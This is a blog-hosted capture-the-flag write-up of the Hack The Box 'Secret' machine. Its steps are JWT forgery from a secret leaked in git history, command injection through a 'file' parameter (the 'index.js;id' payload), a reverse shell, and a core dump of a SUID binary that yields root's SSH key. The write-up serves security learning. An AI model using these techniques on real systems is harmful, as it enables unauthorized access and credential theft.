<!DOCTYPE html>
<html lang="en">
<head>

  <meta charset="utf-8" />

  
  <title>Secret Hackthebox writeup</title>

  
  
  <link href="//cdn.jsdelivr.net" rel="dns-prefetch">
  <link href="//cdnjs.cloudflare.com" rel="dns-prefetch">
  
  <link href="//at.alicdn.com" rel="dns-prefetch">
  
  <link href="//fonts.googleapis.com" rel="dns-prefetch">
  <link href="//fonts.gstatic.com" rel="dns-prefetch">
  
  
  
  
  

  

  
  <meta name="author" content="0xMesbaha">
  <meta name="description" content="In this Box we are going to follow documentation instructions to create a new user , will face sensitive data exposure will let us see a delete commit ,this will help us change our token to the admin token and login as admin , reading source codes we find a command injection so we will have a reverse shell as a user, for the root part there is a suid binary that can read any file on the system and count it , and in the source code it has PR_SET_DUMPABLE so we can dump it if it receives a signal while running ,we will send segmentation fault signal and dump the process then performing strings on the dump we can read the root ssh private key and login as root
">

  
  
    <meta name="twitter:card" content="summary_large_image">
    <meta name="twitter:site" content="@gohugoio">
    <meta name="twitter:title" content="Secret Hackthebox writeup">
    <meta name="twitter:description" content="In this Box we are going to follow documentation instructions to create a new user , will face sensitive data exposure will let us see a delete commit ,this will help us change our token to the admin token and login as admin , reading source codes we find a command injection so we will have a reverse shell as a user, for the root part there is a suid binary that can read any file on the system and count it , and in the source code it has PR_SET_DUMPABLE so we can dump it if it receives a signal while running ,we will send segmentation fault signal and dump the process then performing strings on the dump we can read the root ssh private key and login as root
">
    <meta name="twitter:image" content="/media/secret/20220326104620.png">
  

  
  <meta property="og:type" content="article">
  <meta property="og:title" content="Secret Hackthebox writeup">
  <meta property="og:description" content="In this Box we are going to follow documentation instructions to create a new user , will face sensitive data exposure will let us see a delete commit ,this will help us change our token to the admin token and login as admin , reading source codes we find a command injection so we will have a reverse shell as a user, for the root part there is a suid binary that can read any file on the system and count it , and in the source code it has PR_SET_DUMPABLE so we can dump it if it receives a signal while running ,we will send segmentation fault signal and dump the process then performing strings on the dump we can read the root ssh private key and login as root
">
  <meta property="og:url" content="/post/secret/">
  <meta property="og:image" content="/media/secret/20220326104620.png">




<meta name="generator" content="Hugo 0.86.1">


<link rel="canonical" href="/post/secret/">

<meta name="renderer" content="webkit">
<meta name="viewport" content="width=device-width,initial-scale=1">
<meta name="format-detection" content="telephone=no,email=no,adress=no">
<meta http-equiv="Cache-Control" content="no-transform">


<meta name="robots" content="index,follow">
<meta name="referrer" content="origin-when-cross-origin">







<meta name="theme-color" content="#02b875">
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="apple-mobile-web-app-status-bar-style" content="black">
<meta name="apple-mobile-web-app-title" content="0xMesbaha">
<meta name="msapplication-tooltip" content="0xMesbaha">
<meta name='msapplication-navbutton-color' content="#02b875">
<meta name="msapplication-TileColor" content="#02b875">
<meta name="msapplication-TileImage" content="/icons/icon-144x144.png">
<link rel="icon" href="/favicon.ico">
<link rel="icon" type="image/png" sizes="16x16" href="/icons/icon-16x16.png">
<link rel="icon" type="image/png" sizes="32x32" href="/icons/icon-32x32.png">
<link rel="icon" sizes="192x192" href="/icons/icon-192x192.png">
<link rel="apple-touch-icon" href="/icons/icon-152x152.png">
<link rel="manifest" href="/manifest.json">


<link rel="preload" href="/styles/main-rendered.min.css" as="style">


<link rel="preload" href="https://fonts.googleapis.com/css?family=Lobster" as="style">
<link rel="preload" href="/images/avatar.gif" as="image">
<link rel="preload" href="/images/test.jpg" as="image">


<style>
  body {
    background: rgb(244, 243, 241) url('/images/test.jpg') repeat fixed;
  }
</style>
<link rel="stylesheet" href="/styles/main-rendered.min.css">


<link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Lobster">



<script src="https://cdn.jsdelivr.net/npm/medium-zoom@1.0.2/dist/medium-zoom.min.js"></script>




<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/video.js@7.3.0/dist/video-js.min.css">



  
  
<!--[if lte IE 8]>
  <script src="https://cdn.jsdelivr.net/npm/html5shiv@3.7.3/dist/html5shiv.min.js"></script>
  <script src="https://cdn.jsdelivr.net/npm/respond.js@1.4.2/dest/respond.min.js"></script>
  <script src="https://cdn.jsdelivr.net/npm/videojs-ie8@1.1.2/dist/videojs-ie8.min.js"></script>
<![endif]-->

<!--[if lte IE 9]>
  <script src="https://cdn.jsdelivr.net/npm/eligrey-classlist-js-polyfill@1.2.20180112/classList.min.js"></script>
<![endif]-->


</head>
  <body>
    <div class="suspension">
      <a role="button" aria-label="Go to top" title="Go to top" class="to-top is-hide"><span class="icon icon-up" aria-hidden="true"></span></a>
      
        
      
    </div>
    
    
  <header class="site-header">
  <a href=""><img class="avatar" src="/images/avatar.gif" alt="Avatar"></a>
  
  <h2 class="title"><a href="">0xMesbaha</a></h2>
  
  <p class="subtitle" style="color:#00ab6b">&gt; Hello Friend </p>
  <button class="menu-toggle" type="button" aria-label="Main Menu" aria-expanded="false" tab-index="0">
    <span class="icon icon-menu" aria-hidden="true"></span>
  </button>

  <nav class="site-menu collapsed">
    <h2 class="offscreen">Main Menu</h2>
    <ul class="menu-list">
      
      
      
      
        <li class="menu-item
          
          
          ">
          <a href="/">Posts</a>
        </li>
      
        <li class="menu-item
          
          
          ">
          <a href="/tags/">Tags</a>
        </li>
      
        <li class="menu-item
          
          
          ">
          <a href="/about/">About</a>
        </li>
      
    </ul>
  </nav>
  <nav class="social-menu collapsed">
    <h2 class="offscreen">Social Networks</h2>
    <ul class="social-list"><li class="social-item">
          <a href="//github.com/hussienMisbah" rel="me" title="GitHub" aria-label="GitHub">
	    <span class="icon icon-github" aria-hidden="true"></span>
          </a>
        </li><li class="social-item">
          <a href="//medium.com/@mesbaha" rel="me" title="Medium" aria-label="Medium">
            <span class="icon icon-medium" aria-hidden="true"></span>
          </a>
        </li><li class="social-item">
          <a href="//www.linkedin.com/in/hussien-6331151b2" rel="me" title="LinkedIn" aria-label="LinkedIn">
            <span class="icon icon-linkedin" aria-hidden="true"></span>
          </a>
        </li></ul>
  </nav>
</header>

  <section class="main post-detail">
    <header class="post-header">
      <h1 class="post-title">Secret Hackthebox writeup</h1>
      <p class="post-meta">@0xMesbaha · Mar 26, 2022 · 5 min read</p>
    </header>
    <article class="post-content"><p>In this Box we are going to follow documentation instructions to create a new user , will face sensitive data exposure will let us see a delete commit ,this will help us change our token to the admin token and login as admin , reading source codes we find a command injection so we will have a reverse shell as a user, for the root part there is a suid binary that can read any file on the system and count it , and in the source code it has <code>PR_SET_DUMPABLE</code> so we can dump it if it receives a signal while running ,we will send segmentation fault signal and dump the process then performing strings on the dump we can read the root ssh private key and login as root</p>
<h1 id="scanning-">Scanning :</h1>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-bash" data-lang="bash">nmap -A -T4 10.10.11.120 -oN nmap.txt

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 <span style="color:#f92672">(</span>Ubuntu Linux; protocol 2.0<span style="color:#f92672">)</span>
| ssh-hostkey:
|   <span style="color:#ae81ff">3072</span> 97:af:61:44:10:89:b9:53:f0:80:3f:d7:19:b1:e2:9c <span style="color:#f92672">(</span>RSA<span style="color:#f92672">)</span>
|   <span style="color:#ae81ff">256</span> 95:ed:65:8d:cd:08:2b:55:dd:17:51:31:1e:3e:18:12 <span style="color:#f92672">(</span>ECDSA<span style="color:#f92672">)</span>
|_  <span style="color:#ae81ff">256</span> 33:7b:c1:71:d3:33:0f:92:4e:83:5a:1f:52:02:93:5e <span style="color:#f92672">(</span>ED25519<span style="color:#f92672">)</span>
80/tcp   open  http    nginx 1.18.0 <span style="color:#f92672">(</span>Ubuntu<span style="color:#f92672">)</span>
|_http-server-header: nginx/1.18.0 <span style="color:#f92672">(</span>Ubuntu<span style="color:#f92672">)</span>
|_http-title: DUMB Docs
3000/tcp open  http    Node.js <span style="color:#f92672">(</span>Express middleware<span style="color:#f92672">)</span>
|_http-title: DUMB Docs
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
</code></pre></div><h1 id="enumerating-">Enumerating :</h1>
<p>we can  Follow the documentation guide to register a user :</p>
<p><img src="/media/secret/20220326105821.png" alt="error"></p>
<p>so we can try :</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-bash" data-lang="bash">curl -X POST http://10.10.11.120/api/user/register -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d <span style="color:#e6db74">&#39;{&#34;name&#34;: &#34;MESBAHA&#34;,&#34;email&#34;: &#34;test@testers.com&#34;,&#34;password&#34;: &#34;hecker&#34;}&#39;</span>

</code></pre></div><p><img src="/media/secret/20220326110011.png" alt="error"></p>
<p>and this is the expected response for a successful registration as we see in the Documentation</p>
<p>now we want to login with this user , we can check the documentation :</p>
<p><img src="/media/secret/20220326110215.png" alt="error"></p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-bash" data-lang="bash">curl -X POST http://10.10.11.120/api/user/login -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d <span style="color:#e6db74">&#39;{&#34;email&#34;: &#34;test@testers.com&#34;,&#34;password&#34;: &#34;hecker&#34;}&#39;</span>

</code></pre></div><p><img src="/media/secret/20220326110253.png" alt="error"></p>
<p>and this means we login successfully as documentation tells us :</p>
<p><img src="/media/secret/20220326110340.png" alt="error"></p>
<p>now we can also see we can try access private route :</p>
<p><img src="/media/secret/20220326110541.png" alt="error"></p>
<p>providing our token in the host header and making a get request :</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-bash" data-lang="bash">curl -H <span style="color:#e6db74">&#34;auth-token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJfaWQiOiI2MjNlZGEzZTQ0NWI1YzA0NWM2MzRlMTgiLCJuYW1lIjoiTUVTQkFIQSIsImVtYWlsIjoidGVzdEB0ZXN0ZXJzLmNvbSIsImlhdCI6MTY0ODI4NjQ1MH0.qw4zy4hLWs95jH4y09sEcgOFPxDtOEWaw9Xv_E5ZpOg&#34;</span> http://10.10.11.120/api/priv
</code></pre></div><p><img src="/media/secret/20220326110630.png" alt="error"></p>
<p>so now we want to elevate to admin , we need to provide the admin token to login as admin rule.</p>
<p>we can see at the main page we can download the source-codes</p>
<p><img src="/media/secret/20220326111100.png" alt="error"></p>
<p>maybe downloading the source codes can reveal more information to us</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-bash" data-lang="bash">wget http://10.10.11.120/download/files.zip
unzip files.zip
</code></pre></div><p><img src="/media/secret/20220326111212.png" alt="error"></p>
<p>and we can see it is a git repository , we can check the logs to see if the owner deleted something recently.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-bash" data-lang="bash">git log
</code></pre></div><p><img src="/media/secret/20220326111312.png" alt="error"></p>
<p>and this log seems interesting , if we read the current <code>.env</code></p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-bash" data-lang="bash">DB_CONNECT <span style="color:#f92672">=</span> <span style="color:#e6db74">&#39;mongodb://127.0.0.1:27017/auth-web&#39;</span>
TOKEN_SECRET <span style="color:#f92672">=</span> secret
</code></pre></div><p>it contains the environment variables , there are very common mistakes can happen at this file like providing username and password at the connect variable or releasing secret tokens.</p>
<p>we can follow this path and see the previous version of <code>.env</code></p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-bash" data-lang="bash">git show 67d8da7a0e53d8fadeb6b36396d86cdcd4f6ec78
</code></pre></div><p><img src="/media/secret/20220326111644.png" alt="error"></p>
<p>now we have the secret , we can go to <a href="https://jwt.io/">jwt.io</a> providing our token and the secret we can modify the name to admin.</p>
<p>if we change it to admin it won&rsquo;t work , back to the Documnetation we will see admin name is &ldquo;theadmin&rdquo;
<img src="/media/secret/20220326112313.png" alt="error"></p>
<p>now moidify our token :</p>
<p><img src="/media/secret/20220326112348.png" alt="error"></p>
<p>we can now use this token to request the <code>/priv</code> again</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-bash" data-lang="bash">curl -H <span style="color:#e6db74">&#34;auth-token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJfaWQiOiI2MjNlZGEzZTQ0NWI1YzA0NWM2MzRlMTgiLCJuYW1lIjoidGhlYWRtaW4iLCJlbWFpbCI6InRlc3RAdGVzdGVycy5jb20iLCJpYXQiOjE2NDgyODY0NTB9.V0Sp_hlU1cYAZ_tYZ3_vHJuQ2saLfoiaxPrzZssD2-E&#34;</span> http://10.10.11.120/api/priv
</code></pre></div><p><img src="/media/secret/20220326112426.png" alt="error"></p>
<p><img src="https://media.giphy.com/media/wAxlCmeX1ri1y/giphy.gif" alt=""></p>
<p>now what 😂?</p>
<p>we can check the source code for the private route under <code>local-web/routes/private.js</code></p>
<p><img src="/media/secret/20220326112803.png" alt="error"></p>
<p>if we make a get request as admin to <code>/logs</code> with parameter <code>file</code> it will execute command :</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-bash" data-lang="bash">git log --oneline <span style="color:#e6db74">${</span>file<span style="color:#e6db74">}</span>
</code></pre></div><p>we can try see if it works :</p>
<p><img src="/media/secret/20220326113127.png" alt="error"></p>
<p>and it is working , we can try some command injection here :</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-bash" data-lang="bash">curl -H <span style="color:#e6db74">&#34;auth-token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJfaWQiOiI2MjNlZGEzZTQ0NWI1YzA0NWM2MzRlMTgiLCJuYW1lIjoidGhlYWRtaW4iLCJlbWFpbCI6InRlc3RAdGVzdGVycy5jb20iLCJpYXQiOjE2NDgyODY0NTB9.V0Sp_hlU1cYAZ_tYZ3_vHJuQ2saLfoiaxPrzZssD2-E&#34;</span> <span style="color:#e6db74">&#34;http://10.10.11.120/api/logs?file=index.js;id&#34;</span>
</code></pre></div><p><img src="/media/secret/20220326113231.png" alt="error"></p>
<h1 id="foothold">Foothold:</h1>
<p>Hence we have command injection we can now try to get a reverse shell .</p>
<p>the <code>nc mkfifo</code> payload works fine , at <a href="https://www.revshells.com/">revshells.com</a>, but make sure you url-encoded it , i have used <a href="https://www.urlencoder.org/">this</a></p>
<p>now we are in :</p>
<p><img src="/media/secret/20220326113630.png" alt="error"></p>
<h1 id="privilege-escalation-">Privilege escalation :</h1>
<p>using <a href="https://github.com/carlospolop/PEASS-ng/releases/download/20220320/linpeas.sh">Linpeas</a> or Just manual navigating in the system you will find under <code>/opt</code></p>
<p><img src="/media/secret/20220326113825.png" alt="error"></p>
<p>and this binary has the suid bit which we can try to abuse</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-bash" data-lang="bash">-rwsr-xr-x <span style="color:#ae81ff">1</span> root root <span style="color:#ae81ff">17824</span> Oct  <span style="color:#ae81ff">7</span> 10:03 count
</code></pre></div><p>if we try to run the program we can see it just counts the content in a file</p>
<p><img src="/media/secret/20220326114250.png" alt="error"></p>
<h3 id="analyzing-the-code">Analyzing the code</h3>
<p>we can see the file we supply will be loaded , then the function will count it line by line and word by word,..etc
<img src="/media/secret/20220326114400.png" alt="error"></p>
<p>we can also see this comment and this code line :</p>
<p><img src="/media/secret/20220326114529.png" alt="error"></p>
<p>this seems irregular to me</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-C" data-lang="C">    prctl(PR_SET_DUMPABLE, <span style="color:#ae81ff">1</span>);
</code></pre></div><p>checking <strong>prctl()</strong> manual <a href="https://man7.org/linux/man-pages/man2/prctl.2.html">here</a> we can find :</p>
<p><img src="/media/secret/20220326114727.png" alt="error"></p>
<p>hence it is set to <strong>1</strong> in our case this means we can dump it if it receives a signal like &ldquo;interrupt&rdquo; while it is running</p>
<p>so we will get another reverse shell on another port</p>
<p>in shell-1 : run the binary and specify the file you want
in shell-2 : kill the process  <code>ex: kill -SIGSEGV 1718 </code></p>
<p>now as we have dumped it where is the dumps ? , reading <a href="https://refspecs.linuxfoundation.org/FHS_2.3/fhs-2.3.html#VARCRASHSYSTEMCRASHDUMPS">here</a> it should be at <code>/var/crash</code></p>
<p><img src="/media/secret/20220326120021.png" alt="error"></p>
<p>shell -1 :</p>
<p><img src="/media/secret/20220326120642.png" alt="error"></p>
<p>shell -2 :</p>
<p>get PID from the <code>ps aux</code> command</p>
<p><img src="/media/secret/20220326120717.png" alt="error"></p>
<p>and we see our dump :</p>
<p><img src="/media/secret/20220326120755.png" alt="error"></p>
<p>reading <a href="https://askubuntu.com/questions/434431/how-can-i-read-a-crash-file-from-var-crash">here</a> to know what to do with a <code>.crash</code> file</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-bash" data-lang="bash">apport-unpack  _opt_count.1000.crash /tmp/dumps
</code></pre></div><p>now perform <code>strings</code> on <code>CoreDump</code></p>
<p><img src="/media/secret/20220326121010.png" alt="error"></p>
<h2 id="root-access">Root Access</h2>
<p>Hence we Have port <strong>22</strong> open ,now save the <code>id_rsa</code> and :</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-bash" data-lang="bash">chmod <span style="color:#ae81ff">600</span> id_rsa
ssh root@10.10.11.120 -i id_rsa
</code></pre></div><p><img src="/media/secret/20220326121210.png" alt="error"></p></article>
    <footer class="post-footer">
      
      <ul class="post-tags">
        
          <li><a href="/tags/hackthebox"><span class="tag">Hackthebox</span></a></li>
        
          <li><a href="/tags/api"><span class="tag">API</span></a></li>
        
          <li><a href="/tags/jwt"><span class="tag">JWT</span></a></li>
        
          <li><a href="/tags/suid"><span class="tag">SUID</span></a></li>
        
          <li><a href="/tags/core-dump"><span class="tag">Core-Dump</span></a></li>
        
      </ul>
      
      <p class="post-copyright">
        © all rights reserved for 0xMesbaha.
      </p>
    </footer>
    
      
    
  </section>
  
<footer class="site-footer">
  <p>© 2017-2022 0xMesbaha</p>
  <p>Powered by <a href="https://gohugo.io/" target="_blank" rel="noopener">Hugo</a> with theme <a href="https://github.com/laozhu/hugo-nuo" target="_blank" rel="noopener">Nuo</a>.</p>
  
</footer>


<script src="https://cdn.jsdelivr.net/npm/smooth-scroll@15.0.0/dist/smooth-scroll.min.js"></script>



<script async src="https://cdn.jsdelivr.net/npm/video.js@7.3.0/dist/video.min.js"></script>




<script async src="https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.5/MathJax.js?config=TeX-AMS-MML_HTMLorMML"></script>
<script type="text/x-mathjax-config">
  MathJax.Hub.Config({
    tex2jax: {
      inlineMath: [['$','$'], ['\\(','\\)']],
      displayMath: [['$$','$$'], ['\\[','\\]']],
      processEscapes: true,
      processEnvironments: true,
      skipTags: ['script', 'noscript', 'style', 'textarea', 'pre'],
      TeX: { equationNumbers: { autoNumber: "AMS" },
      extensions: ["AMSmath.js", "AMSsymbols.js"] }
    },
  });
</script>
<script type="text/x-mathjax-config">
  // Fix <code> tags after MathJax finishes running. This is a
  // hack to overcome a shortcoming of Markdown. Discussion at
  // https://github.com/mojombo/jekyll/issues/199
  MathJax.Hub.Queue(() => {
    MathJax.Hub.getAllJax().map(v => v.SourceElement().parentNode.className += ' has-jax');
  });
</script>



<script src="/scripts/index.min.js"></script>

<script>
  if ('serviceWorker' in navigator) {
    navigator.serviceWorker.register('\/service-worker.js').then(function() {
      console.log('[ServiceWorker] Registered');
    });
  }
</script>








  </body>
</html>
